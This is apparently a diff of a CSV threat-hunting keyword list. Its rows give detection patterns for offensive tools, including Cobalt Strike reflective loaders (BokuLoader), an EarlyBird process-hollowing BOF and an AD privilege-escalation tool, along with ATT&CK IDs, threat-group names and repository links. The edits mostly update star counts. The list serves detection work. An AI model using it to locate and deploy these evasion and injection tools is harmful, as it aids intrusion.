identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*boku7/HOLLOW*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" -"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 